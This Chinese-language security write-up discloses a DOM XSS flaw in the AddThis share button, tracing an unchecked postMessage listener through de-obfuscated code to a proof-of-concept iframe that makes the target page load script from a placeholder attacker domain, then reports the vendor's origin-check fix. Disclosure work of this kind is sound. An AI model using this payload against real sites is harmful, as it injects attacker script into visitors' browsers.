AddThis是一款擁有超過一百萬用戶使用的網(wǎng)頁分享按鈕。在今年早些被發(fā)現(xiàn)存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文將描述我是如何識別然后利用AddThis分享按鈕中存在的這些漏洞。

[[179806]]

當我在測試一個使用AddThis的網(wǎng)站的時候，透過Chrome開發(fā)者工具的全局監(jiān)聽器，我注意到它使用了postMessage。

為了判斷它們是否存在漏洞，我在Chrome開發(fā)者工具中的的監(jiān)聽器內(nèi)設置了一個斷點，之后使用

window.postMessage("hello", "*") 

向頁面發(fā)送消息

檢查監(jiān)聽器

代碼沒有進行來源檢查，除此之外來源必須是HTTP/HTTPS頁面。從5364行可以得知消息的預期格式：

at-share-bookmarklet:DATA. 

繼續(xù)進行調(diào)試，我們以合適的格式發(fā)送消息，使代碼在5370行結(jié)束，調(diào)用r函數(shù)。

完成對r函數(shù)的調(diào)用之后接著調(diào)用s函數(shù)：

說起S函數(shù)就非常有趣。它似乎創(chuàng)建了一個新的腳本元素(或許是DOM XSS?)

反壓縮

為了理解這個函數(shù)的作用，我通過命名變量和刪除多行語句來進行反混淆。

e.exports = function(messageData, t, n, s, u, isTrue) { 
if (!o[messageData] || isTrue) { //isTrue is 1 (true) when this function is called. 
var scriptTag = document.createElement("script"); 
if("https:" === window.location.protocol){ 
var isSecurePage = true; 
}else{ 
var isSecurePage = false; 
} 
var protocol = ""; 
var headElement = document.getElementsByTagName("head")[0]; 
scriptTag.setAttribute("type", "text/javascript"); 
scriptTag.setAttribute("async", "async"); 
//Check if user is using Chrome/Safari 
if(window.chrome && window.chrome.self || window.safari && window.safari.extension){ 
if(isSecurePage){ 
protocol = "https"; 
}else{ 
protocol = "http"; 
} 
//If the message data starts with "//", add protocol before 
if(0 === messageData.indexOf("//")){ 
messageData = protocol + messageData; 
} 
} 
//If the message data starts with "//" 
if(0 === messageData.indexOf("//")){ 
scriptTag.src = messageData; 
}else{ 
scriptTag.src = protocol + "//s7.addthis.com/" + messageData; 
} 
headElement.insertBefore(scriptTag, headElement.firstChild); 
o[messageData] = 1; 
return scriptTag; 
} 
return 1; 
} 

閱讀經(jīng)過反壓縮的代碼版本，可以得出結(jié)論，發(fā)送消息的格式大抵如此：

at-share-bookmarklet://ATTACKERHOST/xss.js 

它會新增一個新的腳本元素到包含了“//ATTACKERDOMAIN/xss.js”的頁面。換句話說，存在DOM XSS漏洞。

POC

攻擊者能夠攻擊任何使用了AddThis的網(wǎng)站(存在DOM XSS)。給出我寫的exploit供大家參考：

<iframe id="frame" src="https://targetpage/using_addthis"></iframe> 
<script> 
document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); 
</script> 

修復

我和Matt Abrams(AddThis的CTO)進行了交流，他保證會盡快修復該漏洞并及時推送給終端用戶。該修復方案增加了一個來源檢查以確保消息不會從未知來源發(fā)出。

總結(jié)

簡言之，postMessage通常會導致DOM XSS漏洞。如果你正在使用第三方腳本，一定要去檢查下postMessage實現(xiàn)。